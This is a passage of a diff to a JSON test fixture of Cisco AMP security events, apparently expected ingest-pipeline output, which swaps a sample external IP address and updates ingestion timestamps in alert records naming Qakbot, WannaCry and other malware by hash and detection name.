"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -852,8 +852,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965504002Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.388909700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -875,7 +875,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -923,7 +923,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -933,8 +933,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-30T00:15:43.965506181Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", + "ingested": "2021-12-09T13:35:55.388915800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T12:27:42.000Z", @@ -955,7 +955,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1004,7 +1004,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1014,8 +1014,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965508262Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:55.388921600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "1107296278", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1036,7 +1036,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1068,7 +1068,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1078,8 +1078,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965510322Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:55.388927300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -1096,7 +1096,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -1138,7 +1138,7 @@ "5058b16a86beee96927371210b9a9f682976a50a" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1152,8 +1152,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965512361Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "ingested": "2021-12-09T13:35:55.388933100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -1174,7 +1174,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1232,7 +1232,7 @@ "c235e18bae63d6c4b5daadb833686f943de65a5f" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1249,8 +1249,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965514411Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", + "ingested": "2021-12-09T13:35:55.388938800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1272,7 +1272,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1317,7 +1317,7 @@ "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1327,8 +1327,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965522568Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", + "ingested": "2021-12-09T13:35:55.388944600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1348,7 +1348,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1389,7 +1389,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1399,8 +1399,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965524780Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388950400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1420,7 +1420,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1479,7 +1479,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1496,8 +1496,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965526875Z", - 